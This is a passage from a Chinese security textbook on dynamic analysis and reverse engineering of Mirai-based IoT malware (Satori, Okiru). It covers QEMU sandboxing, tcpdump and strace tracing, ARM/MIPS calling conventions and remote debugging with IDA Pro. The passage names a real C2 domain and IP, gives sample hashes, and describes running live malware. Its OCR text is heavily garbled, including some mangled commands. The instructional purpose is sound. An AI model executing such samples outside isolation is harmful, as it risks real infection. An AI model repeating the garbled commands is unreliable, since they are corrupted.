通过 QEMU 启 动 armel 模 拟 的 机 器 (如 实验 25-1 所 述 )， 但 这 里 有 一 处 重要 改动 : 
需要 在 命令 行 中 添加 选项 -snapshot， 以 侈 恶意 软件 对 guestH Las 的 便 盘 造成 永久 性 损 
坏 。 添 加 该 选项 后 ， 下 次 重启 机 器 时 ， 由 恶意 软件 执行 的 任何 修改 都 将 消失 ， 这 完 
全 符合 我 们 在 分 析 恶 意 软件 时 的 需要 。 我 们 不 需要 多 次 重用 受到 感染 的 主机 ， 每 个 
循环 开始 时 ， 它 必须 是 全 新 的 。 可 通过 VNC 监 视 启 动 过 程 。 一 旦 出 现 登录 提示 符 ， 
就 通过 以 下 scp 命 令 ， 将 恶意 软件 (470.arm) 复 制 2QEMU: 


scp -P 6666 470.arm root@localhost: 


为 方便 记忆 ， 此 处 将 凭据 设置 为 root/root。 成 功 复制 文件 后 ， 登 录 到 ARM 机 器 ， 
并 确保 文件 位 于 正确 的 位 置 。 然 后 将 权限 改 为 755， 准 备 执行 ! 

为 运行 tcpdump， 需要 打开 男 一 个 shell 来 捕获 网 络 流量 。 可 使 用 如 下 命令 开始 捕 
获 网 络 流量 : 

# tcpdump -i eth0 -n host 10.0.2.15 and tcp or udp and not port 23 
-w 2 15.pcap 

我 们 基本 上 是 侦 听 网 络 接口 eth0， 只 专注 于 guest 机 器 的 卫 地 址 ， 只 侦 听 TCP 或 
UDP 闪 ( 以 避免 ARP 或 其 他 吵 杂 的 流量 )。 另 外 ,由 于 正在 处 理 基 于 Mirai 的 恶意 软件 ， 
我 们 想 要 避 开 闹 口 23, 该 闹 口 通 弟 用 于 扫描 互联 网 , 会 使 捕获 文件 的 大 小 快速 增加 。 
强烈 建议 不 要 在 本 地 网 络 上 这 么 做 ， 因 为 你 的 下 地 址 可 能 被 ISP 封 锁 。 

在 另 一 个 终端 上 ， 通 过 执行 以 下 命令 跟踪 恶意 软件 的 执行 。 其 中 最 重要 的 选项 
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可 能 是 -f 和 -o，-{ 选 项 用 于 跟踪 子 进程 (这 十 分 重要 ， 因 为 基于 Mirai 的 恶意 软件 使 用 
fork 隐 藏 在 父 进程 中 )，-o 选 项 用 于 将 收集 到 的 信息 存储 在 文件 中 。 


#strace -f -q -s 100 -o satori.out ./470.arm 


一 旦 strace 和 tcpdump 运 行 ， 就 始终 可 以 监视 这 些 文件 的 大 小 ， 并 不 时 地 传输 当 
前 捕获 的 文件 。 运 行 时 间 不 定 ， 可 能 是 数 分 钟 、 数 小 时 ， 甚 至 数 天 ， 具 体 时 间 取 决 
于 恶意 软件 的 执行 情况 。 在 本 实验 中 ，5$ 分 钟 后 ， 可 以 停止 恶意 软件 的 执行 ( 通 第 的 
做 法 是 天 机 )。 

通过 但 看 捕获 的 流量 ， 可 以 识别 恶意 软件 尝试 连接 的 攻击 者 主机 (C2)， 如 图 
25-14 所 示 。 
Source Destination Protocol Length Info 
10.0.2.15 8.8.8.6 DNS 82 Standard query 0x3730 A network.bigbotpein.com 
8.8.8.8 18.0.2.15 


98 Standard query response 0x3730 A network.bigbotpein.com A 177.67.82.48 
10.0.2.15 8.8.8.8 82 Standard query 0x1c48 A network.bigbotpein.com 


图 25-14 ”恶意 软件 使 用 的 C2 


如 须 了 解 在 该 站 点 执行 的 操作 的 详情 ， 可 以 浏 贤 satori.out 输 出 文件 ， 在 其 中 能 
轻松 识别 到 与 已 解析 出 IP 177.67.82.48 的 Telnet 连 接 ， 如 图 25-15 所 示 。 


, sin port=htons , sin addr-inet addr 


图 25-15 “与 C2 的 Telnet 连 接 


此 次 捕获 过 程 显 示 ， 亚 意 软 件 正在 答 试 运行 一 个 无 限 循环 ， 以 便 从 主机 获取 啊 
应 (在 测试 期 间 是 得 不 到 主机 响应 的 )。 这 是 基于 Mirai 的 恶意 软件 的 常见 行为 ， 是 在 
等 符 接 收 执行 命令 。 

可 以 采用 同样 的 方式 试用 恶意 软件 或 执行 其 他 样本 。 最 终 , 为 得 到 美观 的 报表 ， 
需要 strace 输 出 解析 妖 。 


29.3.2 PANDA 


PANDA(Platform for Architecture-Neutral Dynamic Analysis， 体 系 结构 中 立 的 动 
态 分 析 平 台 ) 是 一 个 开源 平台 。 虽 然 不 完全 文 持 MIPS， 并 仍 处 于 早期 实验 阶段 ， 但 
它 绝 对 是 一 个 值得 关注 的 框架 。 PANDA 正 在 由 麻 省 理工 学 院 林 肯 实 验 室 、 纽 约 大 学 
(NYU) 和 美国 东北 大 学 合作 开发 。 它 使 用 QEMU 进 行 模拟 ， 并 增加 了 多 次 记录 和 午 
放 亚 意 软 件 执行 情况 的 能 力 ， 可 以 倍 助 不 同 插件 执行 系统 调用 监测 和 污点 分 析 等 。 
它 还 包括 一 种 倍 助 插件 间 共 享 功能 来 避 倪 重 复工 作 的 机 制 。 址 憾 的 是 ， 在 我 们 执行 
ARM 和 恶意 软件 分 析 期 间 ， 还 没有 稳定 版 本 可 用 ， 因 此 我 们 没有 建立 实验 环境 。 但 你 
要 留意 PANDA 的 动 癌 ， 并 进行 签 试 。 如 果 发 布 了 正式 稳定 版 本 ，PANDA 有 望 成 为 
物 联 网 动态 恶意 软件 分 析 的 必 备 框 保 之 一 。 
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可 从 PANDA 的 GitHub 存 储 库 构建 PANDA， 其 中 包括 一 个 Docker 镜 像 ， 可 用 于 


25.3.3 BeagleBone Black 开 发 板 


有 些 恶 意 软 件 不 会 在 虚拟 机 上 运行 ， 或 者 高 度 依赖 于 硬件 ， 或 者 正在 对 一 段 汽 
车 信息 娱乐 代码 进行 逆 同 工程 ,在 这 类 情况 下 , 建议 使 用 运行 ARM 系 统 的 真实 设备 ， 
BeagleBone Black 开 发 板 设 备 是 合适 的 : 它 的 成 本 不 到 60$， 如 果 它 受到 恶意 软件 的 
感染 ， 那 么 始终 可 以 刷新 固件 。 此 开发 板 运行 在 Cortex-A8 ARM 系 统 上 ， 使 用 USB、 
Ethemet、HDMI 和 2x46 引 脚 头 连接 。 

如 有 必要 ， 只 需要 为 计算 机 下 载 USB 驱 动 程序 , 设置 局 动用 的 SD 卡 (可 参阅 “ 扩 
展 阅 谈 ” 中 的 BeagleBone Black 链 接 内 容 )， 然 后 通过 USB 将 BeagleBone 设 备 插 入 计 
算 机 ， 这 将 自动 在 192.168.6.x 或 192.168.7.x 区 段 为 你 分 配 卫 地 址 。 此 后 可 使 用 SSH 客 
户 端 登录 到 ARM 系 统 ，ARM 系 统 的 卫 地 址 是 192.168.7.2 或 192.168.6.2。 


25.4 EMS ee Aes) 


BATT Win RE, nude SAPP a EAL Sate RH. AN ete AURIS 
情况 下 了 解 程 序 的 工作 原理 。 传 统 上 ， 大 多 数 工 作 痢 运行 在 Windows 或 Linux 操 作 系 
统 的 Intel 微 处 理 融 上 ， 但 随 厦 物 联网 设备 数量 的 指数 级 增长 ， 要 求 我 们 必须 理解 
ARM 和 MIPS 体 系 结构 。 本 市 将 汇 忌 对 运行 在 这 些 体系 结构 上 的 和 恶 意 软 件 进 行 逆 癌 
工程 时 需要 了 解 的 重要 概念 。 


25.4.1 ARM/MIPS 指 令 集 速成 


在 介绍 物 联网 恶意 软件 调试 之 前 ， 十 分 有 必要 了 解 对 这 类 威胁 进行 逆 疝 工程 时 
需要 掌握 的 重要 概念 。 好 消息 是 ，ARM/MIPS 中 的 指令 数 明显 少 于 x86 体 系 结构 中 的 
指令 数 ， 因 此 掌握 起 来 比较 容易 。 

1. 调用 规范 

与 往常 一 样 ， 当 学 习 新 的 体系 结构 时 ， 必 须 了 
参数 传递 给 函数 ， 以 及 在 何 处 获得 啊 应 。 

下 面 创建 一 些 简单 的 ARM 人 代码， 对 其 进行 编译 ， 看 一 下 实际 中 的 调用 规范 : 


unsigned int funcion( unsigned int, unsigned int, unsigned int, 


解 调用 规范 。 你 需要 了 解 如 何 将 


unsigned int, 
unsigned int, unsigned int, unsigned int ); 
unsigned int mifuncion( void ) { 
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return (funcion(0,1,2,3,4,5,6))@ 
j 


现在 ， 只 需要 使 用 交叉 编 详 项 对 其 进行 编 详 : 


# ./arm-elf-gcc -02 -c call-arm.c -o call-arm 


一 WY 注意 : 可 访问 http://kozos.jp/Vmimage/burning-asm.html, J-"P 428 T Æ HAPU, 
MX 交叉 编译 器 以 及 GDB 和 Objdump 等 其 他 有 用 工具 (用 于 ARM、MIPS、 
PowerPC 和 其 他 很 多 体系 结构 )。 


RESITA RMA, AA CIMA: 


# arm-elf-objdump -D call-arm 


图 2$-16 显 示 了 调用 规范 。 我 们 将 根据 左 列 的 行 号 指 代 汇 编 代 人 三 ， 开 始 是 0、4、 
8、c， 一 直到 40。 


图 2$-16 ”ARM 调 用 规范 


数字 0~3@@ 彼 直接 传 给 汇编 代码 中 的 寄存 器 r0~T3 。 现 在 分 析 图 25$-16 中 行 号 为 
2c、20、8 和 28 的 行 。 将 值 为 4 的 参数 首先 移 到 第 14 行 的 寄存 器 ip， 然 后 通过 第 1c 行 
的 ( 栈 指针 ) 寄 存 右 [sp] 存 储 在 栈 中 。 对 值 为 5 的 参数 重复 相同 的 过 程 。 在 第 18 行 指定 
它 ， 然 后 存储 在 第 30 行 的 [sp, 机 ]( 栈 指针 +4) 对 应 的 栈 中 。 最 后 ， 对 于 值 为 6 的 最 后 一 
个 参数 ， 其 值 首先 在 第 24 行 计算 ， 加 上 当前 值 ip = 4( 在 第 14 行 计算 )， 再 加 上 当前 值 
r2 =2( 在 第 8 行 指定 )， 得 到 值 6。 最 后 在 第 34 行 ， 最 终 存 储 在 [sp, #8]( 栈 指针 + 8) 对 应 
的 栈 中 。 

现在 执行 相同 的 操作 ， 但 此 次 使 用 MIPS toolchain (mips-elf-gcc) 进 行 编译 。 可 在 
图 2$-17 中 看 到 结果 。 与 上 面 一 样 ， 也 基于 左 列 的 行 号 指 代 汇 编 代 码 。 
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图 25-17 ”MIPS 调 用 约定 


此 次 ，0~3 的 函数 参数 在 第 14、18、1c 和 20 行 直接 通过 寄存 器 a0~a3 传 递 。 在 第 4 
行 指 定 值 为 4 的 参数 ， 并 和 存储 在 [ 栈 指针 +16] 对 应 的 栈 中 。 此 后 ， 在 第 c 行 指定 值 为 5 
的 参数 ， 在 第 28 行 存储 在 [ 栈 指针 + 20] 对 应 的 栈 中 。 最 后 ， 在 第 10 行 指定 值 为 6 的 参 
数 ， 在 第 30 行 存储 在 [ 栈 指针 + 24] 对 应 的 栈 中 。 

也 可 对 其 他 体系 结构 进行 相同 的 实验 ， 验 证 调用 规范 。 


2. 物 联 网 汇编 指令 集 备 忘 表 


表 25-3 是 一 个 十 分 方便 的 备 忘 表 ， 可 方便 地 找到 常见 寄存 表 的 用 法 ， 有 助 于 完 
成 逆向 工程 操作 。 


表 25-3 ”多 体系 结构 参考 表 
传递 函数 参数 | PUSH 指令 RO~R3 45 47-48 A0~A3 寄 存 器 
如 采 需 要 更 多 参数 ， 则 | 如果 需要 更 多 参数 , 则 
通过 栈 指针 传递 通过 栈 指针 传递 
调用 函数 CAIL 指 令 BX/BL 寄 存 器 JALR/JR/JAL 寄存 器 
返回 地 址 令 LR 寄存 器 RATTAR 
ARM 和 Thumb 
指令 指针 R15(PC) 寄 存 器 PC 寄存 器 
EK ROR [RH R0 和 R1 寄 存 器 V0 和 V1 寄 存 婴 
系统 调用 SYSENTER SWLSVC 指 令 Service ID: V0 寄存 器 
SYSCALL(64 位 ) Service ID: R7 或 价 编 妈 | Be: AO~A2 
Service ID: EAX 人 参数: RO-R3 
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有 关 体 系 结构 专用 的 指令 ， 请 参考 以 下 URL。 
e ARM: hittp://mfocenter.arm.com/help/topic/com.arm.doc.ihi0042f/THI0042F aapcs.pdf. 
e MIPS: www.mrc.uidaho.edu/mrc/people/jff/digital/ MIPSir.html « 


25.42 ”实验 25-3: IDA Pro 远 程 调 试 和 逆向 工程 


下 面 是 实验 25-3 的 要 求 。 

e 己 授 权 的 IDA Pro. 

e Ubuntu 16.04 虚 拟 机 。 

e MIPS QEMU 坏 境 ( 参 见 实 验 25-1)。 

e Okiru 恶 意 软件 (MIPS 3217): okiru.mips (MD5 为 7a38ee6eel15bd89d50161b 
3061b763ea). 

现在 你 已 经 大 至 了解 了 基本 的 汇编 指令 ， 下 和 面 开 始 调试 恶意 软件 。 


+ 


cou TER: 在 完成 此 类 工作 时 ,最 好 通过 IDA Pro 或 radare2 等 反 汇 编 器 执行 静态 
\ 分 析 ， 也 可 以 使 用 IDA Pro. Immunity Debugger(OllyDBG fork) 或 GDB 等 工 
具 执 行动 态 调 试 


本 实验 介绍 两 种 调试 物 联网 恶意 软件 的 方法 ， 一 种 是 通过 QEMU 独 立 版 本 快速 
调试 ， 另 一 种 是 通过 QEMU 系 统 选项 进行 全 面 的 系统 评估 。 下 面 将 讨论 每 种 方法 的 
优 缺 点 。 


1. 模拟 二 进 制 文 件 


开始 调试 物 联网 恶意 软件 样本 的 快捷 方式 是 只 模拟 二 进 制 文件 而 非 整 个 系统 。 
这 么 做 具有 局 限 性 ， 原 因 是 环境 受 限 ， 网 络 通信 和 系统 检查 可 能 失败 ， 但 这 的 确 是 
了 解 恶 意 软件 细节 的 简捷 方法 。 

为 此 ， 登 录 到 Ubuntu 虚 拟 机 (此 处 运行 的 是 VirtualBox)， 将 恶意 软件 的 二 进 制 文 
件 复制 到 系统 中 (通过 SSH 或 拖 放 方式 来 复制 )。 按 顺序 执行 以 下 命令 : 


$ mkdir ~/GHS 

$ cd ~/GHS 

$ copy ~/okiru.mips -/GH5/ 

$ cp which qemu-mips . 

$ chroot . ./qemu-mips -g 12345 ./okiru.mips 


图 25-18 显 示 已 经 使 用 QEMU 局 动 了 实例 ， 由 于 -g 选 项 , 我 们 生成 了 GDBServer， 
它 已 在 入 口 处 停止 二 进 制 文件 的 执行 ， 等 得 调试 器 通过 TCP 妆 口 12345 进 行 连接 。 
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$ sudo chroot . ./qemu-mips -g 12345 ./okiru.mips 


[sudo] password for danux: 


- 5 sudo lsof -i TCP:12345 
[sudo] password for danux: 
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 
qemu-mips 19875 root 3u IPv4 1423073 etB TCP *:12345 (LISTEN) 


图 25-18 ”使 用 QEMU 启 动 独立 模拟 


现在 ， 在 安装 了 IDA Pro 的 系统 上 ， 打 开 刚 才 执行 的 okiru-mips 二 进 制 文 件 ， 选 
择 Debugsger | Select Debugger | Remote GDB Debugger. 
选择 Debugger | Process Options， 并 填写 选项 ， 确 保 输入 二 进 制 文件 的 路 径 ， 路 
# ie ANTE Ubuntu kz JUPL(Debuggee) F; 输入 下 地 址 和 问 口 ， 然 后 单 击 OK 按 钮 ( 见 图 
UL 


e e e» Debug application setup: gdb 


| NOTE: all paths must be valid on the remote computer 


Application /home/danux/GH5/okiru.mips 
Input file /home/danux/GHb5/okiru.mips 
Parameters 
Hostname ,192.168.1.200 39 Port 12345 


Save network settings as default 


Help Cancel 


图 25-19 ”调试 器 进程 选项 


最 后 在 IDA 中 设置 程序 入 口 的 断 点 (在 对 应 的 代码 行 中 按 FEFE), 确保 恶意 软件 
的 执行 在 开始 处 俘 止 。 虽 然 这 是 预期 行为 ， 但 有 时 会 失败 ， 程 序 会 一 直 执 行 到 结尾 
处 。 这 只 是 一 次 完整 性 检查 。 选 择 Debugger | Start Process 以 运行 。 

系统 会 发 出 警告 消息 ， 确 保 了 解 所 做 的 操作 ， 单 击 Yes 按 钮 。 你 应 当 看 到 一 条 沛 
轧 ， 提 示 正 在 调试 一 个 进程 ， 这 证 明正 在 天 看 正确 的 方 同 前 进 ( 见 图 25-20)。 


第 25 章 “ 反 制 物 联 网 恶意 软件 


Can There is already a process being debugged by remote. 
Do you want to attach to it? 


| [d25-20 ”确认 正在 调试 一 个 进程 


如 采 成 功 附 加 了 一 个 进程 ， 将 看 到 成 功 消 号 ， 如 图 25-21 所 示 。 如 采 侦 到 错误 ， 
则 检查 配置 的 参数 。 

MM 

23 Library function ll Regular function $ Instruction P Data f Unexplored f External symbo 


Debug View e Structures o E Enums 
al IDA View-PC 0 € 6 W General reg 
“r 
| 
Successfully attached to the process. | 
! Now you can browse the process memory and set breakpoints. | 
: | 
Don't display this message again | 
| 
| 
Ok 
| 
| 
| 


4 | oa 


DIT 


Eg 


图 25-21 ”成功 消息 


最 后 可 看 到 ，IDA 己 在 地 址 0x400260 处 的 二 进 制 入 口 俘 止 ( 见 图 2$-22)。 在 此 处 ， 
可 单 步 执行 每 个 函数 ( 按 下 F7 键 ) 或 跳出 函数 ( 按 下 F8 键 )。 
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00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
00000000 
T6FFF800 i MEMORY: 76FFF800 


00000000 4, MEMORY:00000000 


00000000 

00000000 

nop 00000000 
# End of function start 00400260 ù start 


图 2$-22 ”入 口 处 的 调试 器 断 点 


这 种 方法 的 局 限 性 在 于 ， 由 于 恶意 软件 不 在 完整 环境 中 运行 ， 可 能 在 TCP/UDP 
连接 期 间或 笑 试 在 特定 位 置 读 写 时 失败 。 要 摆脱 这 种 局 限 性 ， 建 议 进 行 完整 系 统 
模拟 。 


2. 模拟 完整 系统 


现在 通过 完整 的 REMU 模 拟 运行 恶意 软件 。 为 此 ， 可 在 REMU 虚 拟 机 中 安装 
GDBServer， 然 后 遭 循 相同 的 过 程 远程 连接 到 IDA Pro Debugger. 

可 使 用 以 下 命令 局 动 MIPS 32 位 系统 ， 考 虑 选项 -standalone， 访 选项 确保 镜像 中 
没有 永久 更 改 ; 并 将 端口 12345 重 定向 ， 将 端口 从 Ubuntu 主机 端口 12345 重 定 回 到 将 
要 运行 的 GDBServer 的 QEMU 虚 拟 机 端口 12345: 

$ qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta 

-hda debian wheezy mips standard.qcow2 -append "root=/dev/sdal 

console=tty0" 


-monitor stdio -standalone -vnc 192.168.1.200:1 -redir tep: 6666: :22 
-redir tcp:12345::12345 


系统 局 动 和 运行 后 ， 可 将 恶意 软件 复制 到 QEMU， 并 在 附加 了 恶意 软件 后 ， 在 
ig L112345JH JGDBServer: 

$scp -P 6666 okiru-p.mips root@localhost: 

Sssh -p 6666 root@localhost 


root@debian-mips:~# chmod 755 okiru.mips 
root@debian-mips:~# gdbserver -multi 0.0.0.0:12345 ./okiru-p.mips 
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此 时 ， 只 需要 遵循 与 前 面相 同 的 过 程 ， 通 过 GDBServer 将 IDA Pro 附 加 到 和 恶意 软 
件 即 可 。 唯 一 的 区 列 在 于 MIPS 系 统 上 的 路 径 是 /rootyokiru-p.mips， 因 此 请 相应 地 执 
图 25-23 显 示 GDBServer 正 在 接收 来 自 IDA Pro 远 程 调试 器 GP 地 址 为 192.168.1.185) 


root@debian-mips:~# gdbserver --multi 0.0.0.0:12345 ./okiru-p.mips 
Process ./okiru-p.mips created; pid - 2318 
Lis 


stenina on port 12345 
Amazon ging from host 192.168.1.185 


图 25-23 ”对 完整 QEMU 系 统 的 远程 调试 


此 次 ， 由 于 完 束 模拟 了 系统 ， 可 运行 iptables、tcpdump、strace 或 其 他 任何 工具 
来 跟踪 和 限制 恶意 软件 的 执行 。 


2543 练习 物 联网 恶意 软件 尔 回 工程 


现在 ， 我 们 已 经 准备 好 环境 ， 可 分 析 针 对 ARM 和 MIPS 体 系 结构 的 物 联网 恶意 
软件 。 下 面 完成 对 这 些 威胁 进行 逆 同 工程 的 练习 。 

但 看 要 分 析 的 样本 可 知 ， 己 经 去 除了 从 号 (symbol)。 这 么 做 的 目的 是 增加 逆 癌 
工程 的 难度 。 由 于 没有 图 数 名 ， 分 析 时 间 将 大 大 延长 ， 有 时 甚至 无 法 完成 分 析 。 

$ file okiru.mips 

okiru.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), 

statically linked, stripped 

ie, HUE EASA, ACA et —-MIDA Pro 插 件 ， 或 手动 记录 系统 调 
Hi. AFP oR a ES. 

图 25-24 显 示 了 对 服务 ID 0x104C I5] At Val FA GEIL VO ay E d 3E), 这 对 应 于 API 


getsockname. 


syscall 


[d25-24 重 命 名 MIPS 上 的 系统 调用 


可 以 在 https://w3challs.conysyscalls/ 上 找到 适用 于 多 种 体系 结构 系统 调用 的 优秀 
的 参考 资料 。 感 谢 上 传 资料 的 人 。 
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在 ARM 中 处 理 系 统 调用 时 ， 语 法 是 不 同 的 。 较 新 版 本 使 用 sve 命 令 ， 为 每 个 调 
用 的 服务 了 DD 硬 编码 。 图 25-25 显 示 了 okiru 恶 意 软件 (MD5ad52832a507cede6521e11556f 
7cbb95) 的 ARM 版 本 ，ID 为 0x900005， 在 这 里 对 应 于 open 函 数 调 用 。 


F 

rt 
:LSL#16 
:LSR#16 


r # 


K25-25 ” 重 命 名 ARM 上 的 系统 调用 


重 命名 系统 调用 后 ， 整 个 二 进 制 文件 将 变 得 合理 。 可 像 在 Windows 环 境 中 一 样 
运行 相同 的 逆 癌 工程 过 程 。 最 重要 的 信息 户 段 站 恶意 软件 试图 到 达 的 耳 地 址 或 域 。 
下 面 看 看 物 联 网 设备 上 的 形式 (因为 它 基于 Linux， 但 实际 上 没什么 区 别 )。 

由 于 重 命 名 了 系统 调用 ,我 们 可 在 0x4065C4 处 设置 断 点 ， 它 对 应 于 connect 函 数 
调用 ( 见 图 2$-26)。 因 此 ， 也 可 通过 得 看 定义 确定 参数 : 


int connect(int sockfd, const struct sockaddr *addr, socklen t 
addrlen); 


Was ———— — — — —] 
864686588 la Stu, connect 4B7C3H 
BB4B55BC move SaB, Sua 

8g4B55cH addiu Sal, S$sp, üxiüES«uar 1068 


AG4065C8 li Sag. Bx1B 
BBLB55CE lu $gp. BxiBES-var 1B8DB(Ssp) 
BB84B855DH beg Sub, $56, loc 4865F8 


884855D^4 move Sab, $54 


mpg 


„ send AB7EBUO 
. Ssp, üxiüEBR«var 1828 


， ?fp 
; send A^4B87EBH 
bx 4008 


gp. B8x1BES-«var 18DB(Ssp) 
. $58, lnc hBü661lh 
人 BR5SF li 3 


Hex Yiew-1 一 


rFFFE58BH 8H 66 66 66 66 BB 66 BB HA 45 31 DB 66 BB BB BB ......... EI 
rFFF5BGH HH BB AH 66 HH 66 Bü BB HH BH HH BB AÐ BB BH BH .............--. 
FFFF5BDH HB B2 8H 35 üH BB HA BH 66 HH BB BH ...5............ 


[25-26 ”在 IDA Pro 中 显示 sockaddr 结 构 


由 于 知道 通过 寄存 左 Al 传 递 的 第 二 个 参数 存储 了 sockaddr 结 构 ， 因 此 可 通过 右 
击 Memory Windows( 左 下 方 的 窗口 )， 选 择 Synchronize with | A1, WA ATANAN 
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内 容 。 通过 得 看 以 下 代码 中 的 sockaddr in 结构 定义 ， 可 以 看 到 第 一 个 参数 是 结构 的 
长 度 ， 这 是 可 选 的 ， 此 例 中 未 使 用 。 可 以 看 到 第 二 个 参数 是 sin family, CCEA 
对 应 的 数字 是 00 02( 高 位 优先 字 节 序 )， 对 应 于 AF INET。 然 后 跟踪 端口 内 容 00 35, 

这 是 53( 域 端口 ) 的 十 六 进 制 表示 形式 。 最 后 可 看 到 JP 地址 ， 该 地 址 对 应 于 公共 域 IP 
地 址 08 08 08 08。 


struct sockaddr in { 


uint8 t sin len; 
sa family t sin family; 
in port t cin port; 
struct. in addr sin addr; 
char sin zero[8]; /* unused */ 


F 


RAAME EMERARA ARR, (EDR Pil, n] y AERAR PS 
存 中 的 结构 ， 以 及 如 何 从 中 获取 正确 的 值 。 


25.5 本草 小 结 


- 介绍 了 处 理 医疗 设备 的 RS-232 接 口 时 需要 克服 的 挑战 ， 在 研究 物 联网 便 件 
IN, 这 是 十 分 第 见 的 情形 。 此 后 描述 了 对 物 联网 恶意 软件 执行 动态 分 析 的 不 同方 式 ， 
以 及 完成 动态 分 析 所 需要 的 设置 。 最 后 的 实验 澳 示 了 如 何 使 用 IDA Pro 在 ARM 和 
MIPS 体 系 结 构 上 执行 远程 调试 ， 以 及 如 何 执 行 基 本 的 逆向 工程 。 
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